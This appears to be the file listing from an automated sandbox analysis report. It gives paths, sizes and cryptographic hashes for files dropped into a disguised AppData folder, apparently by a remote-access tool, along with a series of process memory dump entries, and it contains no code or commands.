b2bb79f229d86e74d04bae5ef4813909afeaac530ce71f384c2ce1e1c690d792b413255c35e97b0ef9ff72c68d779dc044a03646d35777a40f1a427eafc14666

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_daxdaoul.l01.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\NSM.LIC

Filesize
253B

MD5
12b8cc1d0a34012bbbbe86880333c567

SHA1
e89659c412af82e31e6d14c34e47d7cc4c5ec9a5

SHA256
9c48ab2790281fca8d75abc805e6091f1b8133898852e6c09657d66f3dd0c48f

SHA512
eb44405dc70b40f15463c075f57b535b6e7c5132a34a99a62d663566ddc50b82f329c40880ab4a5425fe41077d5eec2c28baa500d3b27182ac5f104038ca00dc

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\PCICHEK.DLL

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\PCICL32.dll

Filesize
3.5MB

MD5
d16ffa06a35601a73b73836bf905ed19

SHA1
b8231d36f921e5b75b592ea3374f19216a5c411f

SHA256
80cc439a0633add1dd964bb6bb40ccdcfec3ae28da39fd9416642ab0605d40ab

SHA512
e79b8cfbdd4d86742420a334ab6e0d70bcd3393ab8b07ae6d49ec435aef2bcbd07681774ac7e66eca41c11aa086b398440f74f0b1b77087aa2c18b76c6f3a168

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe

Filesize
33KB

MD5
290c26b1579fd3e48d60181a2d22a287

SHA1
e4c91a7f161783c68cf67250206047f23bd25a29

SHA256
973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128

SHA512
114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.ini

Filesize
733B

MD5
0cdedc9a0a1ee8c9f7ca140e543f2f1c

SHA1
2540f9e3c63b6174a60324b137ffb5697c1a7df8

SHA256
3e63adc8fd536f6045c8ffde42649350f13df7b7d2f7f988f4bfb0591bf9afb6

SHA512
068deac28541fb62792f49a3e368ea9949e3dba93f6c23a942d28e0d9ae87e3bb25a878a9d777a2ec2dc4b918fc0a357f7ce7534c22c62128f2fe2a7c7a14ae2

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\HDiskDefragm\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
memory/2920-184-0x00000000050D0000-0x00000000050DA000-memory.dmp

Filesize
40KB

Download
memory/2920-169-0x00000000079D0000-0x00000000079F2000-memory.dmp

Filesize
136KB

Download
memory/2920-251-0x0000000008160000-0x000000000816E000-memory.dmp

Filesize
56KB

Download
memory/2920-183-0x0000000007630000-0x0000000007642000-memory.dmp

Filesize
72KB

Download
memory/2920-252-0x0000000008170000-0x0000000008184000-memory.dmp

Filesize
80KB

Download
memory/2920-253-0x00000000081B0000-0x00000000081CA000-memory.dmp

Filesize
104KB

Download
memory/2920-180-0x0000000007A60000-0x0000000007A71000-memory.dmp

Filesize
68KB

Download
memory/2920-254-0x00000000081F0000-0x00000000081F8000-memory.dmp

Filesize
32KB

Download
memory/2920-152-0x00000000074E0000-0x0000000007576000-memory.dmp

Filesize
600KB

Download
memory/2920-153-0x00000000068A0000-0x00000000068C2000-memory.dmp

Filesize
136KB

Download
memory/2920-154-0x0000000007BA0000-0x0000000008144000-memory.dmp

Filesize
5.6MB

Download
memory/2920-155-0x0000000007690000-0x00000000076C2000-memory.dmp

Filesize
200KB

Download
memory/2920-156-0x0000000073880000-0x00000000738CC000-memory.dmp

Filesize
304KB

Download
memory/2920-166-0x0000000007670000-0x000000000768E000-memory.dmp

Filesize
120KB

Download
memory/2920-167-0x00000000076E0000-0x0000000007783000-memory.dmp

Filesize
652KB

Download
memory/2920-168-0x0000000007880000-0x000000000788A000-memory.dmp

Filesize
40KB

Download
memory/2920-241-0x0000000073450000-0x00000000737A4000-memory.dmp

Filesize
3.3MB

Download
memory/2920-170-0x0000000007A40000-0x0000000007A54000-memory.dmp

Filesize
80KB

Download
memory/4588-111-0x00000000123C0000-0x0000000012604000-memory.dmp

Filesize
2.3MB

Download
memory/4588-110-0x00000000123C0000-0x0000000012604000-memory.dmp

Filesize
2.3MB

Download
memory/4588-35-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/4588-34-0x00000000123C0000-0x0000000012604000-memory.dmp

Filesize
2.3MB

Download
memory/4588-33-0x00000000123C0000-0x0000000012604000-memory.dmp

Filesize
2.3MB

Download
memory/4868-181-0x0000000071E6E000-0x0000000071E6F000-memory.dmp

Filesize
4KB

Download
memory/4868-126-0x0000000005AA0000-0x0000000005AC2000-memory.dmp

Filesize
136KB

Download
memory/4868-182-0x0000000071E60000-0x0000000072610000-memory.dmp

Filesize
7.7MB

Download
memory/4868-127-0x0000000005B40000-0x0000000005BA6000-memory.dmp

Filesize
408KB

Download
memory/4868-142-0x0000000006750000-0x000000000676A000-memory.dmp

Filesize
104KB

Download
memory/4868-112-0x0000000071E60000-0x0000000072610000-memory.dmp

Filesize
7.7MB

Download
memory/4868-141-0x0000000007890000-0x0000000007F0A000-memory.dmp

Filesize
6.5MB

Download
memory/4868-140-0x0000000006270000-0x00000000062BC000-memory.dmp

Filesize
304KB

Download
memory/4868-107-0x0000000071E60000-0x0000000072610000-memory.dmp

Filesize
7.7MB

Download
memory/4868-108-0x0000000005320000-0x0000000005948000-memory.dmp

Filesize
6.2MB

Download
memory/4868-106-0x0000000002C70000-0x0000000002CA6000-memory.dmp

Filesize
216KB

Download
memory/4868-105-0x0000000071E6E000-0x0000000071E6F000-memory.dmp

Filesize
4KB

Download
memory/4868-139-0x0000000006230000-0x000000000624E000-memory.dmp

Filesize
120KB

Download
memory/4868-138-0x0000000005D50000-0x00000000060A4000-memory.dmp

Filesize
3.3MB

Download
memory/4868-128-0x0000000005BB0000-0x0000000005C16000-memory.dmp

Filesize
408KB

Download
memory/4868-282-0x0000000071E60000-0x0000000072610000-memory.dmp

Filesize
7.7MB

Download